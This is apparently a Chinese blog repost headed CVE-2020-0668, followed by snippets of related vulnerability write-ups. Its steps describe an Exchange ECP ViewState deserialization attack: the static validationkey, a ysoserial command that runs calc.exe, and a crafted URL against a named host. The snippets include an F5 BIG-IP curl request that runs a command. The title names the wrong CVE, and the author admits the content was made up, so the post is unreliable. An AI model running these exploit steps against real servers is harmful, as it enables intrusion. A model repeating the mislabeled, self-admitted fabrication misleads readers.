CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)

阿新 • • 發佈：2021-01-21

目標:mail.sync.net

1.需要四個引數，分別為：

--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（預設，漏洞產生原因）
--validationalg = SHA1（預設，漏洞產生原因）
--generator=B97B4E27（基本預設）
--viewstateuserkey = ASP.NET_SessionId（手工獲取，變數，每次登陸都不一致）
	獲取方式:普通賬號登入https://ip/ecp/default.aspx	viewstateuserkey位於default.aspx-->Headers-->ASP.NET_SessionId中：

99566ec5-d60166d1477410aa-4576-a8b9-

2.生成序列化資料,(彈個計算器)

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c calc.exe" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="99566ec5-d60166d1477410aa-4576-a8b9-" --isdebug –islegacy

3.序列化資料url編碼:

無圖

4.構造連結並訪問:

https://mail.sync.net/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=

目標機器上彈出計算器,此處無圖, 因為上面的東西都是我瞎編的瞎編的瞎編的瞎編的瞎編的

CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)

目標:mail.sync.net 1.需要四個引數，分別為： --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（預設，漏洞產生原因）

（CVE-2021-3156）Linux sudo許可權提升漏洞復現

技術標籤：許可權提升提權網路安全CVE-2021-3156 漏洞概述 1月26日，Sudo釋出安全通告，修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下

Linux sudo許可權提升漏洞（CVE-2021-3156）復現

技術標籤：安全安全漏洞概述 1月26日，Sudo釋出安全通告，修復了一個類Unix作業系統在命令引數中轉義反斜槓時存在基於堆的緩衝區溢位漏洞。當sudo通過-s或-i命令列選項在shell模式下執行命令時，它將在命令引數

Linux polkit本地許可權提升漏洞（CVE-2021-4034）

漏洞詳情漏洞名稱：Linux polkit本地許可權提升漏洞（CVE-2021-4034）漏洞標籤：存在EXP

Linux DirtyPipe許可權提升漏洞 CVE-2022-0847

1、漏洞描述 CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在於 Linux核心 5.8 及之後版本中的本地提權漏洞。攻擊者通過利用此漏洞，可覆蓋重寫任意可讀檔案中的資料，從而可將普通許可權的使用者提升到特權

關於 Linux Polkit 許可權提升漏洞(CVE-2021-4034)的修復方法

映象下載、域名解析、時間同步請點選阿里雲開源映象站近日，國外安全團隊披露了 Polkit 中的 pkexec 元件存在的本地許可權提升漏洞（CVE-2021-4034），Polkit 預設安裝在各個主要的 Linux 發行版本上，易受該漏洞影

Linux Polkit本地許可權提升漏洞復現（CVE-2021-4034）

漏洞描述 Polkit 是用於在類 Unix 作業系統中控制系統範圍特權的元件。它為非特權程序提供了與特權程序進行通訊的有組織的方式。

CVE-2020-14644 weblogic iiop反序列化漏洞

0x00 weblogic 受影響版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 0x01 環境準備

【復現】CVE-2020-16898 TCP/IP遠端程式碼執行漏洞

EXP/POC看文末簡述： CVE-2020-16898，又稱“Bad Neighbor” Windows TCP/IP堆疊不正確地處理ICMPv6 Router Advertisement資料包時，存在一個遠端執行程式碼漏洞。成功利用此漏洞的攻擊者可以獲得在目標伺服器或客戶

CVE-2020-14825：Weblogic反序列化漏洞復現

全程無圖,全靠編參考:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247486336&idx=1&sn=2a054ededbc855622fe2ac6c8906aae0&chksm=90392d70a74ea46635bef3cd4fc414cef87d16a1875ccb690f

CVE-2017-12635（Couchdb 垂直許可權繞過漏洞）

Couchdb 垂直許可權繞過漏洞漏洞描述 1.漏洞編號：CVE-2017-12635 2.影響版本：小於 1.7.0 以及小於 2.1.1

微軟NetLogon許可權提升 CVE-2020-1472 漏洞復現

簡介 NetLogon 遠端協議是一種在 Windows 域控上使用的 RPC 介面,被用於各種與使用者和機器認證相關的任務。最常用於讓使用者使用 NTLM 協議登入伺服器，也用於 NTP 響應認證以及更新計算機域密碼

CVE-2020-1472 | Netlogon 特權提升漏洞預警

CVE-2020-1472 | Netlogon 特權提升漏洞預警 0x01 簡介 CNVD:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202008-548

cve-2020-1472，netlogon特權提升漏洞復現

cve-2020-1472,netlogon特權提升漏洞，漏洞原理：攻擊者通過NetLogon（MS-NRPC），建立與域控間易受攻擊的安全通道時，可利用此漏洞獲取域管訪問許可權。成功利用此漏洞的攻擊者可以在該網路中的裝置上執行經特殊設

CVE-2020-16898 "Bad Neighbor " Windows TCP/IP遠端程式碼執行漏洞學習

　　一、該漏洞和router advertisement相關，先來學習一下相關協議；　　IPV4時代，如果想探測其他主機是否存活，要麼用ARP(一般是局域內網)，要麼用ICMP(一般是公網)。但是在IPV6時代改用了Neighbor Discovery Pro

CVE-2020-14750 WebLogic許可權繞過漏洞復現

0x01 漏洞概述 Oracle Fusion Middleware（Oracle融合中介軟體）是美國甲骨文（Oracle）公司的一套面向企業和雲環境的業務創新平臺。該平臺提供了中介軟體、軟體集合等功能。

Apache Dubbo Provider預設反序列漏洞復現（CVE-2020-1948）

Apache Dubbo Provider預設反序列漏洞（CVE-2020-1948） 0x01 搭建漏洞環境漏洞介紹 2020年06月23日， 360CERT監測發現Apache Dubbo 官方釋出了Apache Dubbo 遠端程式碼執行的風險通告，該漏洞編號為CVE-2020-1948，

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行RCE

cve-2020-5902 : RCE:curl -v -k \'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\'

Windows Win32k 許可權提權漏洞

0X01　　簡介：　　本篇文章將集中介紹兩個利用windows win32k服務提權的漏洞。

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

CVE-2020-0668(Microsoft Windows Kernel許可權提升漏洞)

1.需要四個引數，分別為：

2.生成序列化資料,(彈個計算器)

3.序列化資料url編碼:

4.構造連結並訪問:

相關推薦